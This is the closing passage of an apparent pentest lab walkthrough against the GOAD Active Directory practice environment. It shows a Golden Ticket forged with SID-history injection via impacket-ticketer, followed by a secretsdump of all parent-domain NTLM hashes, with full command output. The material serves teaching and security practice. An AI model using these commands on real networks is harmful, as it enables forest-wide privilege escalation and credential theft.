SEVENKINGDOMS\tywin.lannister (SidTypeUser) 1114: SEVENKINGDOMS\jaime.lannister (SidTypeUser) 1115: SEVENKINGDOMS\cersei.lannister (SidTypeUser) 1116: SEVENKINGDOMS\tyron.lannister (SidTypeUser) 1117: SEVENKINGDOMS\robert.baratheon (SidTypeUser) 1118: SEVENKINGDOMS\joffrey.baratheon (SidTypeUser) 1119: SEVENKINGDOMS\renly.baratheon (SidTypeUser) 1120: SEVENKINGDOMS\stannis.baratheon (SidTypeUser) 1121: SEVENKINGDOMS\petyer.baelish (SidTypeUser) 1122: SEVENKINGDOMS\lord.varys (SidTypeUser) 1123: SEVENKINGDOMS\maester.pycelle (SidTypeUser)
192.168.56.11:S-1-5-21-2343606889-1312097775-3500245986
192.168.56.10:S-1-5-21-2095540843-66383145-2975355457
Now that you have the krbtgt hash and the SID of the domain you want to promote, you can create a Golden Ticket.
The important thing to note here is to add 519 to the end of extra-sid. https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/sid-history-injection#sid-history-injection-attack
┌──(kali㉿kali)-[~/goad/winterfell] └─$ impacket-ticketer -nthash 9cd8721de5b33c59702a9f64787f1ea3 -domain-sid S-1-5-21-2343606889-1312097775-3500245986 -domain north.sevenkingdoms.local -extra-sid S-1-5-21-2095540843-66383145-2975355457-519 goldenuser Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Creating basic skeleton ticket and PAC Infos /usr/share/doc/python3-impacket/examples/ticketer.py:141: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). aTime = timegm(datetime.datetime.utcnow().timetuple()) [*] Customizing ticket for north.sevenkingdoms.local/goldenuser /usr/share/doc/python3-impacket/examples/ticketer.py:600: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration)) /usr/share/doc/python3-impacket/examples/ticketer.py:718: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow()) /usr/share/doc/python3-impacket/examples/ticketer.py:719: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow()) [*] PAC_LOGON_INFO [*] PAC_CLIENT_INFO_TYPE [*] EncTicketPart /usr/share/doc/python3-impacket/examples/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow()) [*] EncAsRepPart [*] Signing/Encrypting final ticket [*] PAC_SERVER_CHECKSUM [*] PAC_PRIVSVR_CHECKSUM [*] EncTicketPart [*] EncASRepPart [*] Saving ticket in goldenuser.ccache
Secretsdump the top-level domain.
┌──(kali㉿kali)-[~/goad/winterfell] └─$ export KRB5CCNAME=goldenuser.ccache ┌──(kali㉿kali)-[~/goad/winterfell] └─$ impacket-secretsdump -k -no-pass -just-dc-ntlm north.sevenkingdoms.local/goldenuser@kingslanding.sevenkingdoms.local Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:20c52248354cb5f4cce513c736ce99a5::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: tywin.lannister:1113:aad3b435b51404eeaad3b435b51404ee:af52e9ec3471788111a6308abff2e9b7::: jaime.lannister:1114:aad3b435b51404eeaad3b435b51404ee:12e3795b7dedb3bb741f2e2869616080::: cersei.lannister:1115:aad3b435b51404eeaad3b435b51404ee:c247f62516b53893c7addcf8c349954b::: tyron.lannister:1116:aad3b435b51404eeaad3b435b51404ee:b3b3717f7d51b37fb325f7e7d048e998::: robert.baratheon:1117:aad3b435b51404eeaad3b435b51404ee:9029cf007326107eb1c519c84ea60dbe::: joffrey.baratheon:1118:aad3b435b51404eeaad3b435b51404ee:3b60abbc25770511334b3829866b08f1::: renly.baratheon:1119:aad3b435b51404eeaad3b435b51404ee:1e9ed4fc99088768eed631acfcd49bce::: stannis.baratheon:1120:aad3b435b51404eeaad3b435b51404ee:d75b9fdf23c0d9a6549cff9ed6e489cd::: petyer.baelish:1121:aad3b435b51404eeaad3b435b51404ee:6c439acfa121a821552568b086c8d210::: lord.varys:1122:aad3b435b51404eeaad3b435b51404ee:52ff2a79823d81d6a3f4f8261d7acc59::: maester.pycelle:1123:aad3b435b51404eeaad3b435b51404ee:9a2a96fa3ba6564e755e8d455c007952::: KINGSLANDING$:1001:aad3b435b51404eeaad3b435b51404ee:f661727e5c8df73a4d6bc2892ff5bda6::: NORTH$:1104:aad3b435b51404eeaad3b435b51404ee:35296a99e4d4c1f512b05b4486ff56aa::: ESSOS$:1105:aad3b435b51404eeaad3b435b51404ee:86ac8394a5c6af4329886bf9e4d58407::: [*] Cleaning up...
Administrator credentials have been obtained.
Conclusion
This completes the process. You have now obtained administrator privileges and authentication information for each machine.
I hope this article has helped you understand pentesting better.
We are currently looking for people who would like to work with us at NFLabs. to conduct research and give back to the field, so we look forward to your application.
Well, I hope to have another opportunity to write something for you.